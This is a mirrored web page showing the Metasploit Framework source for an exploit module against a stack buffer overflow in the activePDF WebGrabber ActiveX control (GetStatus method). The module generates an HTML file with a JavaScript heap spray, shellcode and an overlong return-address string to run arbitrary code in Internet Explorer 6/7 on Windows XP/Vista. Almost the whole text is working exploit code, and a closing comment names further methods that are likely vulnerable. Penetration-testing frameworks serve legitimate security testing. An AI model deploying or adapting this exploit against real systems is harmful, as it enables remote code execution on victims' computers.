Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/activepdf_webgrabber.rb
23590 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = LowRanking

8


9
  include Msf::Exploit::FILEFORMAT

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'activePDF WebGrabber ActiveX Control Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When

18
          sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)

19
          an attacker may be able to execute arbitrary code. This control is not marked safe

20
          for scripting, so choose your attack vector accordingly.

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => [ 'MC' ],

24
        'References' => [

25
          [ 'CVE', '2008-20001' ],

26
          [ 'OSVDB', '64579'],

27
          [ 'URL', 'http://www.activepdf.com/products/serverproducts/webgrabber/' ],

28
        ],

29
        'DefaultOptions' => {

30
          'EXITFUNC' => 'process',

31
          'DisablePayloadHandler' => true

32
        },

33
        'Payload' => {

34
          'Space' => 1024,

35
          'BadChars' => "\x00",

36
        },

37
        'Platform' => 'win',

38
        'Targets' => [

39
          [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]

40
        ],

41
        'DisclosureDate' => '2008-08-26',

42
        'DefaultTarget' => 0,

43
        'Notes' => {

44
          'Reliability' => UNKNOWN_RELIABILITY,

45
          'Stability' => UNKNOWN_STABILITY,

46
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

47
        }

48
      )

49
    )

50


51
    register_options(

52
      [

53
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),

54
      ]

55
    )

56
  end

57


58
  def exploit

59
    # Encode the shellcode.

60
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

61


62
    # Create some nops.

63
    nops = Rex::Text.to_unescape(make_nops(4))

64


65
    # Set the return.

66
    ret = Rex::Text.uri_encode([target.ret].pack('L'))

67


68
    # Randomize the javascript variable names.

69
    vname = rand_text_alpha(rand(100) + 1)

70
    var_i = rand_text_alpha(rand(30) + 2)

71
    rand1 = rand_text_alpha(rand(100) + 1)

72
    rand2 = rand_text_alpha(rand(100) + 1)

73
    rand3 = rand_text_alpha(rand(100) + 1)

74
    rand4 = rand_text_alpha(rand(100) + 1)

75
    rand5 = rand_text_alpha(rand(100) + 1)

76
    rand6 = rand_text_alpha(rand(100) + 1)

77
    rand7 = rand_text_alpha(rand(100) + 1)

78
    rand8 = rand_text_alpha(rand(100) + 1)

79


80
    content = %Q|<html>

81
<head>

82
<script>

83
try {

84
  var #{vname} = new ActiveXObject('APWebGrabber.Object');

85
  var #{rand1} = unescape('#{shellcode}');

86
  var #{rand2} = unescape('#{nops}');

87
  var #{rand3} = 20;

88
  var #{rand4} = #{rand3} + #{rand1}.length;

89
  while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};

90
  var #{rand5} = #{rand2}.substring(0,#{rand4});

91
  var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});

92
  while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};

93
  var #{rand7} = new Array();

94
  for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }

95
  var #{rand8} = "";

96
  for (#{var_i} = 0; #{var_i} < 800; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }

97
  #{vname}.GetStatus(#{rand8},1);

98
} catch( e ) { window.location = 'about:blank' ; }

99
</script>

100
</head>

101
</html>

102
|

103


104
    content = Rex::Text.randomize_space(content)

105


106
    print_status("Creating '#{datastore['FILENAME']}' file ...")

107


108
    file_create(content)

109
  end

110
end

111


112
=begin

113


114
Other methods that are vulnerable.

115


116
[id(0x00000050), helpstring("Clean up after a WWWPrint call.")]

117
void CleanUp(BSTR ServerIPAddress, long ServerPort);

118


119
[id(0x00000055)]

120
BSTR Wait(BSTR IPAddress, long PortNumber, short WaitTime, BSTR AcceptedCommands);

121


122
...and probably more.

123
=end

124


125